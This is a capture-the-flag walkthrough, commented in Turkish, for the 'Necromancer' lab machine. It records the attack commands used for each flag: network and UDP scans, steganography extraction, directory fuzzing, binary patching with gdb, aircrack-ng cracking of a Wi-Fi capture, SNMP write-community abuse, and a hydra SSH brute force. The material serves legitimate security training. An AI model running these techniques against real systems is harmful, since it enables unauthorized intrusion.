[necro]

sudo netdiscover

192.168.1.103 –> ip

sudo nmap -A -Pn -vv 192.168.1.103 -p-

tcp scan denedim ama sonuc bos

sudo nmap -A -sU -T4 -vv 192.168.1.103 -p-
	Discovered open port 666/udp on 192.168.1.103
	PORT    STATE SERVICE REASON              VERSION
	666/udp open  doom?   udp-response ttl 64

nmap ile udp scan yapiyorum 666 portu acik

fakat bu porta ne yapmam gerektigini bilemiyorum.

-Flag 1-

wireshark ile trafigi dinlerken 4444 portu uzerinde birkac farkli istek dolandigini goruyorum,

makine 4444 portundan paket yolluyor, netcat ile 4444 portunu dinlemeye aliyorum

nc -nlvp 4444
	#base64 bir metin cikti asagidaki decode edilmis hali
	"""
	Welcome!

	You find yourself staring towards the horizon, with nothing but silence surrounding you.
	You look east, then south, then west, all you can see is a great wasteland of nothingness.

	Turning to your north you notice a small flicker of light in the distance.
	You walk north towards the flicker of light, only to be stopped by some type of invisible barrier.  

	The air around you begins to get thicker, and your heart begins to beat against your chest.
	You turn to your left.. then to your right!  You are trapped!

	You fumble through your pockets.. nothing!  
	You look down and see you are standing in sand.  
	Dropping to your knees you begin to dig frantically.

	As you dig you notice the barrier extends underground!  
	Frantically you keep digging and digging until your nails suddenly catch on an object.

	You dig further and discover a small wooden box.  
	flag1{e6078b9b1aac915d11b9fd59791030bf} is engraved on the lid.

	You open the box, and find a parchment with the following written on it. "Chant the string of flag1 - u666"
	"""

-Flag 2-

flag1 hashini internet uzerinde aradigimda opensesame’ e esit oldugunu gordum

chant the string of flag1 -u666 dedigine gore opensesame stringini udp ile 666 portuna yollamak gerekiyo

yine nc ile fakat bu sefer 666 portuna ve udp pakedi olarak

sudo nc -nvu 192.168.1.103 666
	Connection to 192.168.1.103 666 port [udp/*] succeeded!
	You gasp for air! Time is running out!
	You gasp for air! Time is running out!
	You gasp for air! Time is running out!
	You gasp for air! Time is running out!
	You gasp for air! Time is running out!
	opensesame
	"""A loud crack of thunder sounds as you are knocked to your feet!

	Dazed, you start to feel fresh air entering your lungs.

	You are free!

	In front of you written in the sand are the words:

	flag2{c39cd4df8f2e35d20d92c2e44de5f7c6}

	As you stand to your feet you notice that you can no longer see the flicker of light in the distance.

	You turn frantically looking in all directions until suddenly, a murder of crows appear on the horizon.

	As they get closer you can see one of the crows is grasping on to an object. As the sun hits the object, 		shards of light beam from its surface.

	The birds get closer, and closer, and closer.

	Staring up at the crows you can see they are in a formation.

	Squinting your eyes from the light coming from the object, you can see the formation looks like the numeral 80.

	As quickly as the birds appeared, they have left you once again.... alone... tortured by the deafening sound 	 of silence.

	666 is closed."""

-Flag 3-

numeral 80 kismi 80 portuna isaret olmali

browserdan http://192.168.1.103:80/ adresine gidiyorum

resmi gordugum gibi acikcasi aklima steganografi geldi

binwalk pileoffeathers.jpg
	36994         0x9082          Zip archive data, at least v2.0 to extract, compressed size: 121, uncompressed 		size: 125, name: feathers.txt
	37267         0x9193          End of Zip archive

tahmin ettigim gibi cikti. oncelikle sadece uzantiyi degistirmeyi deniyorum

mv pileoffeathers.jpg pileoffeathers.zip
unzip pileoffeathers.zip
	Archive:  pileoffeathers.zip
	warning [pileoffeathers.zip]:  36994 extra bytes at beginning or within zipfile #zipin basinda 36994 byte var fazladan diyor fotografin sonuna zip eklenmis oldgundan dolayi
	  (attempting to process anyway)
	  inflating: feathers.txt  
more feathers.txt
	ZmxhZzN7OWFkM2Y2MmRiN2I5MWMyOGI2ODEzNzAwMDM5NDYzOWZ9IC0gQ3Jvc3MgdGhlIGNoYXNtIGF0IC9hbWFnaWNicmlkZ2VhcHBlYXJzYXR0aGVjaGFzbQ==
echo "ZmxhZzN7OWFkM2Y2MmRiN2I5MWMyOGI2ODEzNzAwMDM5NDYzOWZ9IC0gQ3Jvc3MgdGhlIGNoYXNtIGF0IC9hbWFnaWNicmlkZ2VhcHBlYXJzYXR0aGVjaGFzbQ==" | base64 -d
	flag3{9ad3f62db7b91c28b68137000394639f} - Cross the chasm at /amagicbridgeappearsatthechasm

-Flag 4-

browserdan 192.168.1.103:80/amagicbridgeappearsatthechasm adresine gidiyorum

simdi de magicbook.jpg var elimde. ayni yontemle saklamayacaklarini dusunsem de

binwalk ile yine kontrol ediyorum

bu resim dosyasindan bir sey cikmayacagindan emin oldum.

hikayeye gore bi buyuyle karsi karsiyayiz ve bu buyuden bizi koruyacak bir sihirli bir iteme ihtiyacimiz var

directory fuzz denemek geldi aklima bunun icin de dirb kullaniyorum

sudo dirb http://192.168.1.103/amagicbridgeappearsatthechasm '/usr/share/wordlists/rockyou.txt'

talisman ciktisini verdi

http://192.168.1.103/amagicbridgeappearsatthechasm/talisman urlsine gittigimde bir bin dosyasini indiriyor

chmod +x talisman
./talisman
	You have found a talisman.
	The talisman is cold to the touch, and has no words or symbols on it's surface.
	Do you want to wear the talisman?

buna verecegimiz her yanit sonucunda nothing happens ciktisini verecegine emin olduktan sonra

calistirilabilir dosyayi incelemeye baslayabiliriz ._.

debug/reverse icin gdb kullanicam

gdb talisman
	GNU gdb (Debian 7.12-6) 7.12.0.20161007-git
	...
(gdb) info functions
	All defined functions:
	Non-debugging symbols:
	0x080482d0  _init
	0x08048310  printf@plt
	0x08048320  [email protected]
	0x08048330  [email protected]
	0x08048350  _start
	0x08048380  __x86.get_pc_thunk.bx
	0x08048390  deregister_tm_clones
	0x080483c0  register_tm_clones
	0x08048400  __do_global_dtors_aux
	0x08048420  frame_dummy
	0x0804844b  unhide
	0x0804849d  hide
	0x080484f4  myPrintf
	0x08048529  wearTalisman
	0x08048a13  main
	0x08048a37  chantToBreakSpell
	0x08049530  __libc_csu_init
	0x08049590  __libc_csu_fini
	0x08049594  _fini
	#wearTalisman ve chantToBreakSpell fonksiyonlari zaten goze carpanlar
	#wearTalismana bir breakpoint koyuyorum sonra da programi calistiriyorum
(gdb) break wearTalisman
	Breakpoint 1 at 0x8048529
(gdb) run
	Starting program: /home/d1scharg3d/Downloads/talisman
	Breakpoint 1, 0x0804852d in wearTalisman ()
	#bi sonraki fonksiyona atliyorum
(gdb) jump chantToBreakSpell
	Continuing at 0x8048a3b.
	!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
	You fall to your knees.. weak and weary.
	Looking up you can see the spell is still protecting the cave entrance.
	The talisman is now almost too hot to touch!
	Turning it over you see words now etched into the surface:
	flag4{ea50536158db50247e110a6c89fcf3d3}
	Chant these words at u31337
	!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
	[Inferior 1 (process 2758) exited normally]

flag4{ea50536158db50247e110a6c89fcf3d3}

bu sefer de flagi decode edip udp olarak 31337 portundan yollamak gerekiyo

md5(ea50536158db50247e110a6c89fcf3d3) = blackmagic

-Flag 5-

echo "blackmagic" | nc -nvu 192.168.1.103 31337
	As you chant the words, a hissing sound echoes from the ice walls.
	The blue aura disappears from the cave entrance.
	You enter the cave and see that it is dimly lit by torches; shadows dancing against the rock wall as you 		descend deeper and deeper into the mountain.
	You hear high pitched screeches coming from within the cave, and you start to feel a gentle breeze.
	The screeches are getting closer, and with it the breeze begins to turn into an ice cold wind.
	Suddenly, you are attacked by a swarm of bats!
	You aimlessly thrash at the air in front of you!
	The bats continue their relentless attack, until…. silence.
	Looking around you see no sign of any bats, and no indication of the struggle which had just occurred.
	Looking towards one of the torches, you see something on the cave wall.
	You walk closer, and notice a pile of mutilated bats lying on the cave floor. Above them, a word etched in 		blood on the wall.
	/thenecromancerwillabsorbyoursoul
	flag5{0766c36577af58e15545f099a3b15e60}

-Flag 6-

http://192.168.1.103/thenecromancerwillabsorbyoursoul/ adresine gittigimde

flag6{b1c3ed8f1db4258e4dcb0ce565f6dc03} ve necromancer isimli dosyaya ulasiyorum

ayrica sayfanin alt kisminda u161 bilgisi de mevcut (snmp?)

-Flag 7-

file necromancer
	necromancer: bzip2 compressed data, block size = 900k
bzip2 -d necromancer
	bzip2: Can't guess original name for necromancer -- using necromancer.out
file necromancer.out
	necromancer.out: POSIX tar archive (GNU)
tar -xvf necromancer.out
	necromancer.cap

son olarak elimde bir .cap dosyasi var wireshark ile aciyorum.

802.11 paketlerinin dolastigini farkediyorum buyuk ihtimalle wifi aginin

parolasinda flag vardir. cap uzantili dosyasi aircrack’ e verirsem halledecegini umuyorum.

	aircrack-ng necromancer.cap -w /usr/share/wordlists/rockyou.txt
	KEY FOUND! [ death2all ]

bunu snmpyle alakali bir seyde kullanmam gerek verdigi porttan yola cikarak

snmpwalk -c death2all -v 1 192.168.1.103
	iso.3.6.1.2.1.1.1.0 = STRING: "You stand in front of a door."
	iso.3.6.1.2.1.1.4.0 = STRING: "The door is Locked. If you choose to defeat me, the door must be Unlocked."
	iso.3.6.1.2.1.1.5.0 = STRING: "Fear the Necromancer!"
	iso.3.6.1.2.1.1.6.0 = STRING: "Locked - death2allrw!"
	End of MI
snmpset -c death2allrw -v 1 192.168.1.103 1.3.6.1.2.1.1.6.0 s Unlocked
	iso.3.6.1.2.1.1.6.0 = STRING: "Unlocked"
snmpget -c death2allrw -v 1 192.168.1.103 1.3.6.1.2.1.1.6.0
	iso.3.6.1.2.1.1.6.0 = STRING: "flag7{9e5494108d10bbd5f9e7ae52239546c4} - t22"
snmpwalk -c death2allrw -v 1 192.168.1.103
	iso.3.6.1.2.1.1.1.0 = STRING: "You stand in front of a door."
	iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.255
	iso.3.6.1.2.1.1.3.0 = Timeticks: (165223) 0:27:32.23
	iso.3.6.1.2.1.1.4.0 = STRING: "The door is unlocked! You may now enter the Necromancer's lair!"
	iso.3.6.1.2.1.1.5.0 = STRING: "Fear the Necromancer!"
	iso.3.6.1.2.1.1.6.0 = STRING: "flag7{9e5494108d10bbd5f9e7ae52239546c4} - t22"

flag7{9e5494108d10bbd5f9e7ae52239546c4} = demonslayer

-Flag 8,9,10-

t22 diye bahsettigi, tcp 22 yani ssh,

flag7den de elimde demonslayer var,

hikaye uzerinden dusunursek demonslayer username olmali

hydra ile ssh brute force denicem

	hydra -l demonslayer -P '/usr/share/wordlists/rockyou.txt' 192.168.1.103 ssh
	...
	[DATA] attacking service ssh on port 22
	[22][ssh] host: 192.168.1.103   login: demonslayer   password: 12345678
	...
	ssh [email protected]
	...ASCII ART...
	...
	$ ls
	flag8.txt
	$ cat flag8.txt
	You enter the Necromancer's Lair!
	A stench of decay fills this place.  
	Jars filled with parts of creatures litter the bookshelves.
	A fire with flames of green burns coldly in the distance.
	Standing in the middle of the room with his back to you is the Necromancer.  
	In front of him lies a corpse, indistinguishable from any living creature you have seen before.
	He holds a staff in one hand, and the flickering object in the other.
	"You are a fool to follow me here!  Do you not know who I am!"
	The necromancer turns to face you.  Dark words fill the air!
	"You are damned already my friend.  Now prepare for your own death!"
	Defend yourself!  Counter attack the Necromancer's spells at u777!
nc -u 192.168.1.103 777

remote baglandigimdan bi sonuc vermedigini anlamam biraz uzun surdu,

cunku hikayeye gore necronun inindeydik, ssh ile makinaya tekrar baglaniyorum

	ssh [email protected]
	[email protected]'s password:
	Last login: Sun Oct  8 03:13:37 2017
	...ASCII ART...
	$ nc -u localhost 777
	** You only have 3 hitpoints left! **
	Defend yourself from the Necromancer's Spells!
	Where do the Black Robes practice magic of the Greater Path?  kelewan
	flag8{55a6af2ca3fee9f2fef81d20743bda2c}

	** You only have 3 hitpoints left! **
	Defend yourself from the Necromancer's Spells!
	Who did Johann Faust VIII make a deal with?  mephistopheles
	flag9{713587e17e796209d1df4c9c2c2d2966}

	** You only have 3 hitpoints left! **
	Defend yourself from the Necromancer's Spells!
	Who is tricked into passing the Ninth Gate?  hedge
	flag10{8dc6486d2c63cafcdc6efbba2be98ee4}
	A great flash of light knocks you to the ground; momentarily blinding you!
	As your sight begins to return, you can see a thick black cloud of smoke lingering where the Necromancer once stood.
	An evil laugh echoes in the room and the black cloud begins to disappear into the cracks in the floor.
	The room is silent.
	You walk over to where the Necromancer once stood.
	On the ground is a small vile.

-Flag 11-

son flagi bulmamiz gerek tek ipucu da small vile

$ ls -la
	total 44
	...
	-rw-r--r--  1 demonslayer  demonslayer  196 Oct  8 03:26 .smallvile
	...
$ cat .smallvile
	You pick up the small vile.
	Inside of it you can see a green liquid.
	Opening the vile releases a pleasant odour into the air.
	You drink the elixir and feel a great power within your veins!
  #damarlarinda buyuk bir guc hissediyorsun demis, sistemdeki
  #buyuk bir guc ancak root haklari olabilir
$ sudo -l
	Matching Defaults entries for demonslayer on thenecromancer:
	env_keep+="FTPMODE PKG_CACHE PKG_PATH SM_PATH SSH_AUTH_SOCK"

	User demonslayer may run the following commands on thenecromancer:
		(ALL) NOPASSWD: /bin/cat /root/flag11.txt
$ sudo cat /root/flag11.txt
	Suddenly you feel dizzy and fall to the ground!
	As you open your eyes you find yourself staring at a computer screen.
	Congratulations!!! You have conquered......

		      .                                                      .
		    .n                   .                 .                  n.
	  .   .dP                  dP                   9b                 9b.    .
	 4    qXb         .       dX                     Xb       .        dXp     t
	dX.    9Xb      .dXb    __                         __    dXb.     dXP     .Xb
	9XXb._       _.dXXXXb dXXXXbo.                 .odXXXXb dXXXXb._       _.dXXP
	 9XXXXXXXXXXXXXXXXXXXVXXXXXXXXOo.           .oOXXXXXXXXVXXXXXXXXXXXXXXXXXXXP
	  `9XXXXXXXXXXXXXXXXXXXXX'~   ~`OOO8b   d8OOO'~   ~`XXXXXXXXXXXXXXXXXXXXXP'
		`9XXXXXXXXXXXP' `9XX'          `98v8P'          `XXP' `9XXXXXXXXXXXP'
		    ~~~~~~~       9X.          .db|db.          .XP       ~~~~~~~
		                    )b.  .dbo.dP'`v'`9b.odb.  .dX(
		                  ,dXXXXXXXXXXXb     dXXXXXXXXXXXb.
		                 dXXXXXXXXXXXP'   .   `9XXXXXXXXXXXb
		                dXXXXXXXXXXXXb   d|b   dXXXXXXXXXXXXb
		                9XXb'   `XXXXXb.dX|Xb.dXXXXX'   `dXXP
		                 `'      9XXXXXX(   )XXXXXXP      `'
		                          XXXX X.`v'.X XXXX
		                          XP^X'`b   d'`X^XX
		                          X. 9  `   '  P )X
		                          `b  `       '  d'
		                           `             '                       
		                           THE NECROMANCER!
		                             by  @xerubus

		               flag11{42c35828545b926e79a36493938ab1b1}

bb